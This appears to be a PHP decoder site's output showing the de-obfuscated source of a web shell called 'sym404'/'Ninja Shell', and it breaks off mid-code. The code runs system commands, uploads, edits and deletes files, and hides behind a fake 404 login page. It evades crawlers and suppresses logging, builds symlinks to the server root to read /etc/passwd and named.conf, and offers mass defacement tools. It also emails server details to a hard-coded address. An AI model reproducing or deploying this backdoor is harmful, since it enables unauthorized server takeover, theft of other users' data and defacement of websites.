Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto FH7Y1; T94cO: ?> ">Symlink</a> </li> <li class="nav-item a..
Decoded Output download
<?php
goto FH7Y1; T94cO: ?>
">Symlink</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto JQ179; KZekZ: ?>
</div>
<?php goto jOvHV; T6Zx7: ?>
">KillSelf</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto je9LO; v2QYS: if (isset($_FILES["n"])) { $z = $_FILES["n"]["name"]; $r = count($z); for ($i = 0; $i < $r; $i++) { if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) { echo $f; } else { echo $g; } } } goto KZekZ; c6VdL: if (isset($_GET["d"])) { $d = uhex($_GET["d"]); $GNJ[2](uhex($_GET["d"])); } else { $d = $GNJ[3](); } goto KYwN6; ypfD9: function uhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } goto P7F_7; wpjyr: ob_start(); goto Bb2fs; JQ179: echo hex($d); goto ACUF3; FH7Y1: header("X-XSS-Protection: 0"); goto EnY30; T7IMq: $ssh2 = function_exists("ssh2_connect") ? "ON" : "OFF"; goto ZnHFS; olU8v: ?>
&<?php goto fmkqW; wOzaX: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto uOWNV; JhmNA: $curl = function_exists("curl_version") ? "ON" : "OFF"; goto IIpSk; HN1nt: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto Rw_Vq; oHFSW: ?>
<script>
$(".ajx").click(function(t) {
t.preventDefault();
var e = $(this).attr("href");
history.pushState("", "", e), $.get(e, function(t) {
$("body").html(t)
})
});
</script>
</body>
</html><?php goto zjHKV; UERui: $from_shellcode = "lamer@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto kUPbE; osRMF: ?>
">CGI</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto g7kGv; Uvvee: ?>
&<?php goto TH0Po; VC6la: function rec($j) { global $GNJ; if (trim(pathinfo($j, PATHINFO_BASENAME), ".") === '') { return; } if ($GNJ[8]($j)) { array_map("rec", glob($j . DIRECTORY_SEPARATOR . "{,.}*", GLOB_BRACE | GLOB_NOSORT)); $GNJ[35]($j); } else { $GNJ[10]($j); } } goto vdQRi; lBXOt: echo hex("symlink"); goto T94cO; EGDxf: $ruby = exe("ruby --help") ? "ON" : "OFF"; goto Az_Ax; TEuZb: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . " - " . $_SERVER["HTTP_HOST"] . ''; goto we56n; rTrrL: echo hex($d); goto XD1SR; oRSvi: print OS() === "Windows" ? windisk() : ''; goto NlReM; ioq2X: function usergroup() { if (!function_exists("posix_getegid")) { $user["name"] = @get_current_user(); $user["uid"] = @getmyuid(); $user["gid"] = @getmygid(); $user["group"] = "?"; } else { $user["uid"] = @posix_getpwuid(posix_geteuid()); $user["gid"] = @posix_getgrgid(posix_getegid()); $user["name"] = $user["uid"]["name"]; $user["uid"] = $user["uid"]["uid"]; $user["group"] = $user["gid"]["name"]; $user["gid"] = $user["gid"]["gid"]; } return (object) $user; } goto wOzaX; u43G3: $pgsql = function_exists("pg_connect") ? "ON" : "OFF"; goto D_eJv; YVf7P: $baslik = "sym404 shell 20203"; goto XpLsr; CwgRm: echo hex("mass"); goto zy23N; IIpSk: $wget = exe("wget --help") ? "ON" : "OFF"; goto kYwcm; r0GAq: ?>
<br />
<a class="navbar-brand" href="#">
<img src="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png" width="30" height="30" class="d-inline-block align-top auto" alt="Ainz Moe">
</a>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item active">
<a class="nav-link ajx" href="?">
<font color="red">Home</font>
</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto t8JQ7; YAiG_: echo hex($d); goto hK4iP; je9LO: echo hex($d); goto bAArr; gEJFa: echo hex($d); goto xdKHP; lAjin: ?>
&<?php goto bl7TV; eyEKQ: mail($kime, $baslik, $EL_MuHaMMeD); goto bwr7D; kf2_2: echo hex("logout"); goto Lppco; h_b2Z: ?>
">Scanner</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto XduHV; MF5M5: if (isset($_GET["1"])) { echo $f; } elseif (isset($_GET["0"])) { echo $g; } else { NULL; } goto oHFSW; fmkqW: echo hex("cgi"); goto osRMF; KKmDN: ?>
">Bypass</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto YAiG_; TH0Po: echo hex("scanner"); goto h_b2Z; PKgUw: echo " (" . x("{$d}/{$c}") . ")"; goto eA7X7; fXLUQ: @mail($to_email, $server_mail, $linkcr, $header); goto Gyn42; agJfX: $total = hdd(disk_total_space("/")); goto Jcdc4; sjfgL: echo hex($d); goto UBd5O; u0Uo5: echo hex("exploiter"); goto mykc0; TAxKP: echo hex($d); goto Uvvee; bl7TV: echo hex("killself"); goto T6Zx7; DcThR: $___ = count($Array); goto gKKnj; t8JQ7: echo hex($d); goto ZytAl; uOWNV: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "ON" : "OFF"; goto NB8Bn; R4JNL: @ini_set("log_errors", 0); goto xGEUJ; Zoa0i: $magicquotes = function_exists("get_magic_quotes_gpc") ? "ON" : "OFF"; goto T7IMq; DmamT: echo hex("bypass"); goto KKmDN; qlmbl: @ini_set("error_log", NULL); goto R4JNL; Jcdc4: $used = $total - $freespace; goto J1Qf_; EnY30: session_start(); goto wpjyr; yz2gd: $c_ = "</td>
\x9 \x9</tr>\xa \x9\x9 \x9 </tbody>\xa \x9 </table>"; goto nzSNF; nzSNF: $d_ = "<br />
\x9 \x9 \x9 \x9\x9 <br />
\x9\x9\x9 \x9<input type="submit" class="form-control col-md-3" value=" OK " />
\x9 \x9\x9\x9 \x9 \x9</form>"; goto Hdh5S; RrubB: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto UERui; ACUF3: ?>
&<?php goto PeNk_; k4jQM: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "
"; goto nLmNr; ZytAl: ?>
&<?php goto hHXpc; eg14O: ?>
">Info</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto RKF2n; WYkCI: function x($c) { global $GNJ; $x = $GNJ[24]($c); if (($x & 49152) == 49152) { $u = "s"; } elseif (($x & 40960) == 40960) { $u = "l"; } elseif (($x & 32768) == 32768) { $u = "-"; } elseif (($x & 24576) == 24576) { $u = "b"; } elseif (($x & 16384) == 16384) { $u = "d"; } elseif (($x & 8192) == 8192) { $u = "c"; } elseif (($x & 4096) == 4096) { $u = "p"; } else { $u = "u"; } $u .= $x & 256 ? "r" : "-"; $u .= $x & 128 ? "w" : "-"; $u .= $x & 64 ? $x & 2048 ? "s" : "x" : ($x & 2048 ? "S" : "-"); $u .= $x & 32 ? "r" : "-"; $u .= $x & 16 ? "w" : "-"; $u .= $x & 8 ? $x & 1024 ? "s" : "x" : ($x & 1024 ? "S" : "-"); $u .= $x & 4 ? "r" : "-"; $u .= $x & 2 ? "w" : "-"; $u .= $x & 1 ? $x & 512 ? "t" : "x" : ($x & 512 ? "T" : "-"); return $u; } goto Sl_IC; wt7eq: @ini_set("output_buffering", 0); goto SEdNH; PeNk_: echo hex("config"); goto HxZ4H; zy23N: ?>
">Mass Tools</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto gEJFa; ji2w1: function login_shell() { ?>
<!DOCTYPE HTML>
<html>
<head>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["HTTP_HOST"]; ?>
Port 80</address>
<style>
input {
margin: 0;
background-color: #fff;
border: 1px solid #fff;
text-align: center;
}
</style>
<br><br><br><br><br>
<form method="post">
<center>
<input type="password" name="password" autocomplete="off">
</form>
</center>
<?php die; } goto z99GC; Lppco: ?>
">
<font color="red">Logout</font>
</a>
</li>
</ul>
</div>
<a class="navbar-brand" href="#">
<img src="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png" width="30" height="30" class="d-inline-block align-top auto" alt="Ainz Moe">
</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
</nav>
</div>
<?php goto nr5UH; Uca8b: ?>
">Auto Tools</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto TAxKP; mykc0: ?>
">Exploiter</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto sjfgL; MHSBI: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto qH131; CdAia: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } goto T4ghk; jOvHV: echo "<br>Current Directory : "; goto PMPzS; MNnsd: $Array = array("7068705f756e616d65", "70687076657273696f6e", "6368646972", "676574637764", "707265675f73706c6974", "636f7079", "66696c655f6765745f636f6e74656e7473", "6261736536345f6465636f6465", "69735f646972", "6f625f656e645f636c65616e28293b", "756e6c696e6b", "6d6b646972", "63686d6f64", "7363616e646972", "7374725f7265706c616365", "68746d6c7370656369616c6368617273", "7661725f64756d70", "666f70656e", "667772697465", "66636c6f7365", "64617465", "66696c656d74696d65", "737562737472", "737072696e7466", "66696c657065726d73", "746f756368", "66696c655f657869737473", "72656e616d65", "69735f6172726179", "69735f6f626a656374", "737472706f73", "69735f7772697461626c65", "69735f7265616461626c65", "737472746f74696d65", "66696c6573697a65", "726d646972", "6f625f6765745f636c65616e", "7265616466696c65", "617373657274"); goto DcThR; vdQRi: function dre($y1, $y2) { global $GNJ; ob_start(); $GNJ[16]($y1($y2)); return $GNJ[36](); } goto jCWj1; J1Qf_: function path() { if (isset($_GET["dir"])) { $dir = str_replace("\", "/", $_GET["dir"]); @chdir($dir); } else { $dir = str_replace("\", "/", getcwd()); } return $dir; } goto HwInW; xGEUJ: @ini_set("max_execution_time", 0); goto wt7eq; SlGCP: ?>
&<?php goto DmamT; B83al: echo hex("about"); goto u8eDX; Rw_Vq: function hdd($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto Bo2yb; XpLsr: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "
\xa"; goto QTE_S; Pjama: error_reporting(0); goto d2RdT; mkR7V: echo hex($d); goto olU8v; u8eDX: ?>
">About Us</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto R4ec1; Az_Ax: $mssql = function_exists("mssql_connect") ? "ON" : "OFF"; goto u43G3; Ogzh2: $f = $o_[0] . "Success!" . $o_[1]; goto HF7pj; n2Ago: if (version_compare(PHP_VERSION, "5.3.0", "<")) { @set_magic_quotes_runtime(0); } goto CdAia; gjCiw: function ER() { global $GNJ, $d; $GNJ[38]($GNJ[9]); header("Location: ?d=" . hex($d) . "&0"); die; } goto WYkCI; kUPbE: $to_email = "[email protected]"; goto TEuZb; dUjt0: $show_include = !empty($safemode_include_dir) ? "OFF" : "ON"; goto HN1nt; KYwN6: $k = $GNJ[4]("/(\\|\/)/", $d); goto r0GAq; D_eJv: $python = exe("python --help") ? "ON" : "OFF"; goto Zoa0i; mZ52w: $show_ds = !empty($ds) ? "{$ds}" : "All Functions Is Accessible"; goto b5jeo; zjHKV: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto RrubB; hHXpc: echo hex("info"); goto eg14O; NlReM: echo "<br><br>"; goto C683H; Hdh5S: if (isset($_GET["s"])) { echo $a_ . uhex($_GET["s"]) . $b_ . "
\x9\x9 \x9 \x9\x9 <textarea readonly class = "form-control">" . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . "</textarea>
\x9\x9 \x9\x9\x9\x9\x9\x9<br />\xa \x9\x9\x9 \x9\x9\x9<br />
\x9\x9 \x9\x9<input onclick="location.href='?d=" . $_GET["d"] . "&e=" . $_GET["s"] . "'" type="submit" class="form-control col-md-3" value=" EDIT " />\xa \x9\x9 " . $c_; } elseif (isset($_GET["y"])) { echo $a_ . "REQUEST" . $b_ . "
\x9\x9 \x9 \x9\x9\x9 <form method="post">\xa\x9 \x9\x9 \x9\x9 <input class="form-control md-3" type="text" name="1" autocomplete="off" /> \xa\x9\x9 \x9 \x9 \x9 <input class="form-control md-3" type="text" name="2" autocomplete="off" />
\x9 \x9 \x9 " . $d_ . "\xa \x9 \x9\x9<br />\xa\x9 \x9 \x9\x9<textarea readonly class = "form-control">"; if (isset($_POST["2"])) { echo $GNJ[15](dre($_POST["1"], $_POST["2"])); } echo "</textarea>
\x9\x9 \x9\x9 " . $c_; } elseif (isset($_GET["e"])) { echo $a_ . uhex($_GET["e"]) . $b_ . "\xa\x9 \x9\x9 \x9\x9 <form method="post">\xa \x9\x9\x9 \x9\x9\x9<textarea name="e" class="form-control">" . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . "</textarea>\xa\x9 \x9 \x9 \x9\x9\x9<br />
\x9 \x9\x9 \x9\x9 <br />
\x9\x9 \x9\x9 \x9 \x9 <span class="w">BASE64</span> :
\x9 \x9 \x9<center><select id="b64" name="b64" class = "form-control col-md-3">\xa\x9 \x9 \x9<option value="0">NO</option>
\x9 \x9 \x9\x9 <option value="1">YES</option>
\x9\x9\x9\x9\x9\x9\x9\x9 </select></center>
\x9 \x9\x9\x9 \x9" . $d_ . "\xa \x9 \x9\x9\x9\x9" . $c_ . "\xa \x9\x9\x9 \x9\x9
\x9 \x9\x9<script>
\x9 \x9 $("#b64").change(function() {
\x9\x9\x9\x9\x9 if($("#b64 option:selected").val() == 0) {\xa\x9\x9\x9\x9\x9 \x9 var X = $("textarea").val();\xa\x9 \x9\x9\x9 var Z = atob(X);\xa \x9\x9 \x9 $("textarea").val(Z);
\x9\x9}\xa \x9\x9\x9\x9else {\xa \x9\x9 \x9 var N = $("textarea").val();\xa\x9 \x9 \x9 var I = btoa(N);
\x9 \x9 \x9\x9 $("textarea").val(I);\xa \x9\x9 }
\x9 \x9});\xa\x9 \x9</script>"; if (isset($_POST["e"])) { if ($_POST["b64"] == "1") { $ex = $GNJ[7]($_POST["e"]); } else { $ex = $_POST["e"]; } $fp = $GNJ[17](uhex($_GET["e"]), "w"); if ($GNJ[18]($fp, $ex)) { OK(); } else { ER(); } $GNJ[19]($fp); } } elseif (isset($_GET["x"])) { rec(uhex($_GET["x"])); if ($GNJ[26](uhex($_GET["x"]))) { ER(); } else { OK(); } } elseif (isset($_GET["t"])) { echo $a_ . uhex($_GET["t"]) . $b_ . "\xa \x9\x9\x9\x9 \x9\x9<form action="" method="post">\xa\x9\x9\x9\x9\x9 <input name="t" class="form-control col-md-3" autocomplete="off" type="text" value="" . $GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))) . "">
\x9 \x9 \x9\x9 " . $d_ . "
\x9 \x9 \x9 \x9" . $c_; if (!empty($_POST["t"])) { $p = $GNJ[33]($_POST["t"]); if ($p) { if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) { ER(); } else { OK(); } } else { ER(); } } } elseif (isset($_GET["k"])) { echo $a_ . uhex($_GET["k"]) . $b_ . "\xa \x9 \x9<form action="" method="post">
\x9 \x9 \x9\x9\x9 <input name="b" autocomplete="off" class="form-control col-md-3" type="text" value="" . $GNJ[22]($GNJ[23]("%o", $GNJ[24](uhex($_GET["k"]))), -4) . "">
\x9 \x9\x9 \x9\x9\x9" . $d_ . "
\x9\x9 \x9\x9" . $c_; if (!empty($_POST["b"])) { $x = $_POST["b"]; $t = 0; for ($i = strlen($x) - 1; $i >= 0; --$i) { $t += (int) $x[$i] * pow(8, strlen($x) - $i - 1); } if (!$GNJ[12](uhex($_GET["k"]), $t)) { ER(); } else { OK(); } } } elseif (isset($_GET["l"])) { echo $a_ . "+DIR" . $b_ . "\xa\x9\x9 \x9 <form action="" method="post">\xa\x9\x9 \x9 <input name="l" autocomplete="off" class="form-control col-md-3" type="text" value="">\xa \x9 \x9\x9" . $d_ . "
\x9 \x9 " . $c_; if (isset($_POST["l"])) { if (!$GNJ[11]($_POST["l"])) { ER(); } else { OK(); } } } elseif (isset($_GET["q"])) { if ($GNJ[10](__FILE__)) { $GNJ[38]($GNJ[9]); header("Location: " . basename($_SERVER["PHP_SELF"]) . ''); die; } else { echo $g; } } elseif (isset($_GET[hex("info")])) { echo "<hr>SYSTEM INFORMATION<center>
\x9\x9\x9\x9 \x9<textarea class = "form-control" readonly>\xa\x9 \x9
\x9\x9Server \x9: " . $_SERVER["HTTP_HOST"] . "\xa\x9 \x9Server IP : " . $_SERVER["SERVER_ADDR"] . " Your IP : " . $_SERVER["REMOTE_ADDR"] . "
\x9 \x9Kernel Version \x9 : " . php_uname() . "\xa\x9\x9 Software \x9\x9\x9\x9: " . $_SERVER["SERVER_SOFTWARE"] . "\xa\x9\x9\x9Storage Space \x9 : " . $used . "/" . $total . "(Free : " . $freespace . ")" . "\xa\x9\x9 User / Group \x9 \x9: " . $user . " (" . $uid . ") | " . $group . " (" . $gid . ")
\x9 Time On Server \x9 : " . date("d M Y h:i:s a") . "\xa\x9\x9 Disable Functions \x9\x9: " . $show_ds . "
\x9\x9\x9Safe Mode \x9\x9 : " . $sm . "\xa\x9\x9\x9PHP VERSION \x9 \x9 : " . phpversion() . " On " . php_sapi_name() . "\xa\x9Open_Basedir : " . $show_obdir . " | Safe Mode Exec Dir : " . $show_exec . " | Safe Mode Include Dir : " . $show_include . "\xa\x9MySQL : " . $mysql . " | MSSQL : " . $mssql . " | PostgreSQL : " . $pgsql . " | Perl : " . $perl . " | Python : " . $python . " | Ruby : " . $ruby . " | WGET : " . $wget . " | cURL : " . $curl . " | Magic Quotes : " . $magicquotes . " | SSH2 : " . $ssh2 . " | Oracle : " . $oracle . "
\x9\x9 \x9\x9 \xa\x9 \x9 \x9</textarea>\xa \x9 \x9 </center>"; } elseif (isset($_GET[hex("mass")])) { echo "<hr>
\x9 \x9\x9\x9 <h2><center>Mass Tools Ninja Shell</center></h2>\xa\x9 \x9\x9\x9\x9<br>
\x9 \x9\x9\x9<center>
\x9 <form method = 'POST'>
\x9\x9\x9\x9\x9 <div class = 'row clearfix'>\xa \x9\x9\x9\x9 <div class = 'col-md-4'>\xa \x9 \x9\x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("mass_tool") . "' style='width: 250px;' height='10'><center>Mass Deface / Delete Files</center></a>
\x9 \x9\x9</div>
\x9\x9\x9 \x9<div class = 'col-md-4'>\xa\x9\x9\x9\x9 <a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("mass_user") . "' style='width: 250px;' height='10'><center>Mass User Changer</center></a>
\x9\x9 \x9</div>\xa \x9\x9 \x9<div class = 'col-md-4'>\xa\x9 \x9\x9\x9 <a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("mass_title") . "' style='width: 250px;' height='10'><center>Mass Title Changer</center></a>
\x9\x9 \x9</div>\xa \x9\x9 \xa\x9\x9\x9 </div></form></center><hr><br>"; } elseif (isset($_GET[hex("symlink")])) { echo "<hr><br>"; echo "<center>
\x9 \x9 <h2> Symlink Ninja Shell </h2> <br><br>
\x9\x9 \x9\x9<form method = 'POST'>\xa \x9\x9 <div class = 'row clearfix'>\xa\x9\x9\x9\x9 <div class = 'col-md-4'>\xa \x9 \x9\x9 <input type = 'submit' name = 'symlink' class = 'form-control' value = 'Symlink' style='width: 250px;' height='10'>\xa \x9\x9\x9\x9 </div>\xa \x9\x9\x9<div class = 'col-md-4'>
\x9\x9\x9\x9\x9<input type = 'submit' name = 'symlink2' class = 'form-control' value = 'Symlink 2' style='width: 250px;' height='10'>\xa\x9\x9\x9 \x9 </div>
\x9 \x9 <div class = 'col-md-4'>\xa\x9 \x9 \x9<input type = 'submit' name = 'symlink_py' class = 'form-control' value = 'Symlink Python' style='width: 250px;' height='10'>\xa\x9\x9\x9\x9 </div>\xa\x9 \x9
\x9\x9\x9 \x9</div></form></center><hr><br>"; if (isset($_POST["symlink"])) { @set_time_limit(0); echo "<br><br><center><h2>Symlink Ninja Shell</h2></center><br><br><center><div class=content>"; @mkdir("sym", 511); $htaccess = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n AddHandler server-parsed .php n AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any"; $write = @fopen("sym/.htaccess", "w"); fwrite($write, $htaccess); @symlink("/", "sym/root"); $filelocation = basename(__FILE__); $read_named_conf = @file("/etc/named.conf"); if (!$read_named_conf) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div class='tmp'><table border='1' bordercolor='lime' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>"; foreach ($read_named_conf as $subject) { if (eregi("zone", $subject)) { preg_match_all("#zone "(.*)"#", $subject, $string); flush(); if (strlen(trim($string[1][0])) > 2) { $UID = posix_getpwuid(@fileowner("/etc/valiases/" . $string[1][0])); $name = $UID["name"]; @symlink("/", "sym/root"); $name = $string[1][0]; $iran = ".ir"; $israel = ".il"; $indo = ".id"; $sg12 = ".sg"; $edu = ".edu"; $gov = ".gov"; $gose = ".go"; $gober = ".gob"; $mil1 = ".mil"; $mil2 = ".mi"; $malay = ".my"; $china = ".cn"; $japan = ".jp"; $austr = ".au"; $porn = ".xxx"; $as = ".uk"; $calfn = ".ca"; if (eregi("{$iran}", $string[1][0]) or eregi("{$israel}", $string[1][0]) or eregi("{$indo}", $string[1][0]) or eregi("{$sg12}", $string[1][0]) or eregi("{$edu}", $string[1][0]) or eregi("{$gov}", $string[1][0]) or eregi("{$gose}", $string[1][0]) or eregi("{$gober}", $string[1][0]) or eregi("{$mil1}", $string[1][0]) or eregi("{$mil2}", $string[1][0]) or eregi("{$malay}", $string[1][0]) or eregi("{$china}", $string[1][0]) or eregi("{$japan}", $string[1][0]) or eregi("{$austr}", $string[1][0]) or eregi("{$porn}", $string[1][0]) or eregi("{$as}", $string[1][0]) or eregi("{$calfn}", $string[1][0])) { $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $string[1][0] . "</div>"; } echo "
\x9\x9\x9<tr>\xa \x9\x9<td>\xa\x9 <div class='dom'><a target='_blank' href=http://www." . $string[1][0] . "/>" . $name . " </a> </div>\xa\x9\x9 </td>\xa\x9\x9\x9<td>
\x9\x9" . $UID["name"] . "\xa\x9\x9\x9</td>\xa\x9\x9 <td>
\x9 \x9<a href='sym/root/home/" . $UID["name"] . "/public_html' target='_blank'>Symlink </a>\xa \x9</td>\xa\x9\x9\x9</tr></div> "; flush(); } } } } echo "</center></table>"; } elseif (isset($_POST["symlink2"])) { $dir = path(); $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); $d0mains = @file("/etc/named.conf"); if ($d0mains) { @mkdir("Exc_sym", 511); @chdir("Exc_sym"); @exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks
DirectoryIndex Exc.htm\xaAddType text/plain .php\xaAddHandler text/plain .php\xaSatisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa<table align=center border=1 style='width:60%;border-color:#333333;'>\xa<tr>
<td align=center><font size=2>S. No.</font></td>\xa<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("zone", $d0main)) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www." . $domains[1][0] . "/><font class=txt>" . $domains[1][0] . "</font></a></td>\xa<td>" . $user["name"] . "</td>\xa<td><a href='{$full}/Exc_sym/root/home/" . $user["name"] . "/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush(); $dcount++; } } } echo "</table>"; } else { $TEST = @file("/etc/passwd"); if ($TEST) { @mkdir("Exc_sym", 511); @chdir("Exc_sym"); exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks\xaDirectoryIndex Exc.htm
AddType text/plain .php
AddHandler text/plain .php\xaSatisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa <table align=center border=1><tr>\xa <td align=center><font size=3>S. No.</font></td>\xa <td align=center><font size=3>Users</font></td>
<td align=center><font size=3>Symlink</font></td></tr>"; $dcount = 1; $file = fopen("/etc/passwd", "r") or die("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("/\/(.*?)\:\//s", $s, $matches); $matches = str_replace("home/", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo "<tr><td align=center><font size=2>" . $dcount . "</td>\xa <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href={$full}/Exc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++; } fclose($file); echo "</table>"; } else { if ($os != "Windows") { @mkdir("Exc_sym", 511); @chdir("Exc_sym"); @exe("ln -s / root"); $file3 = "\xa Options Indexes FollowSymLinks\xaDirectoryIndex Exc.htm\xaAddType text/plain .php\xaAddHandler text/plain .php\xaSatisfy Any\xa"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa <h2><center>Symlink2 Ninja Shell</center></h2>
<table align=center border=1><tr>
<td align=center><font size=3>ID</font></td>
<td align=center><font size=3>Users</font></td>\xa <td align=center><font size=3>Symlink</font></td></tr>"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join(":", $uid) . "
"; } } echo "<br/>"; $temp = trim($temp); $file5 = fopen("test.txt", "w"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("test.txt", "r") or die("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("/\/(.*?)\:\//s", $s, $matches); $matches = str_replace("home/", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo "<tr><td align=center><font size=2>" . $dcount . "</td>\xa <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href={$full}/Exc_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++; } fclose($file); echo "</table></center>"; unlink("test.txt"); } else { echo "<center><font size=3>Cannot create Symlink</font></center>"; } } } } elseif (isset($_POST["symlink_py"])) { $sym_dir = mkdir("ia_sympy", 493); chdir("ia_sympy"); $file_sym = "sym.py"; $sym_script = 